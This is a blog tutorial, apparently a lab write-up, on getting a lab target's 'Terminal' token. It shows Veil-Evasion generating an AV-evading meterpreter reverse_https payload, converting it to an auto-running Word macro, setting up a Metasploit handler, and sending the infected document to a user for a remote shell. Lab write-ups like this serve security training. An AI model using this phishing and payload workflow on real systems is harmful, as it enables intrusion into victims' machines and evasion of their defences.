V.9 (Part 13) – Token Terminal

Categories Tutorials

So, here we are again, almost finishing the lab v9.
This TOKEN was really hard, specially because you had to have in mind everything you went ahead till arrive here, and that everything has its own purpose.

Remember the reply email we were getting when going after the Email Token?
That is our way in into Terminal Token, and I have to be honest, I had no idea if I didn’t had a look into the WriteUp 😛

So, let’s go into it:
So it seams that r.diaz might be on a “Terminal” and it is allowed to open Microsoft documents, that might give us a door into his “Terminal” 😀

So lets get things started, shall we?

So, we need to make use of macros to insert a payload in the document. But we must be aware that we might need to bypass an AV system. To do so we will make use of a tool known as Veil-Evasion:
First lets download it.

Make sure you use root, when installing it, else you will have problems installing python27. (I had them 😉 )

/opt/#git clone
/opt/Veil-Evasion/setup# ./

After installing Veil-Evasion and all it’s dependency, we must now create our payload:

/opt/Veil-Evasion# ./
Veil-Evasion | [Version]: 2.28.2
 [Web]: | [Twitter]: @VeilFramework

 Main Menu

	51 payloads loaded

 Available Commands:

	use         	Use a specific payload
	info        	Information on a specific payload
	list        	List available payloads
	update      	Update Veil-Evasion to the latest version
	clean       	Clean out payload folders
	checkvt     	Check payload hashes vs. VirusTotal
	exit        	Exit Veil-Evasion


So, now we had to select our payload, and we opted for payload 23 (powershell/meterpreter/rev_https), you can issue the command list to see all the available payloads.
Why this one? Because the inside network 192.168.X.X can only communicate with “our” vpn network via HTTPS port 443.

 [menu>>]: use 23
 [powershell/meterpreter/rev_https>>]: set LHOST
 [i] LHOST =>
 [powershell/meterpreter/rev_https>>]: set LPORT 443
 [i] LPORT => 443

 [powershell/meterpreter/rev_https>>]: generate

Now we need to convert the generated .bat into a viable macro to put into the word document.
After some research I found out a tool know as macro_safe. Download it here

So, now we just run our program to get our macro done in the final format:

~/$ ./ /usr/share/veil-output/source/terminalpayload.bat macroterminalworddoc

Ok, we are almost done, now lets open in a Windows machine box, Microsoft Word, and add the macro:
Going to Tab Development -> Visual Basic (Alt+F11) and copy your macro into ThisDocument
Since this macro is to execute automaticaly, we need to change the function name to AutoOpen() since this is a word document, if it was excel we would change to Auto_Open().

We are almost done, now we just need to setup our listener, and send our infected word document:

/$ sudo msfconsole -r /usr/share/veil-output/handlers/terminalpayload_handler.rc
[*] Processing /usr/share/veil-output/handlers/terminalpayload_handler.rc for ERB directives.
resource (/usr/share/veil-output/handlers/terminalpayload_handler.rc)> use exploit/multi/handler
resource (/usr/share/veil-output/handlers/terminalpayload_handler.rc)> set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
resource (/usr/share/veil-output/handlers/terminalpayload_handler.rc)> set LHOST
resource (/usr/share/veil-output/handlers/terminalpayload_handler.rc)> set LPORT 443
LPORT => 443
resource (/usr/share/veil-output/handlers/terminalpayload_handler.rc)> set ExitOnSession false
ExitOnSession => false
resource (/usr/share/veil-output/handlers/terminalpayload_handler.rc)> exploit -j
[*] Exploit running as background job.

[*] Started HTTPS reverse handler on
[*] Starting the payload handler...

msf exploit(handler) >

Note: Please notice that we invoke our handler that was created by Veil, into the directory /usr/share/veil-output/handlers/ we do so, calling msfconsole with -r option and the handler name. That will set our handler for us.

Now we just need to send the word document:
Just wait a while and there we go:
We interact with the session:
Lets get some information like where we are:
Now we must search for our token:
Now we went to the Desktop directory and there it was:
There you go: Token terminal – **i***l*

Hope you guys have enjoyed this one as much as I did. It was really a good learning experience, and it opened my mind to new kind of attacks, which I ended up exploring.

Note: The method above doesn’t work on most recent versions of Microsoft Office, for that you have other methods 😉 I ended up taking a lot of time after successfully taking this Token, to try other different methods of add macros, and bypass even the most recent AV. Upon requests I might upload a tutorial about how to do so, but think about it…

No Comments

Leave a Reply

Your email address will not be published. Required fields are marked *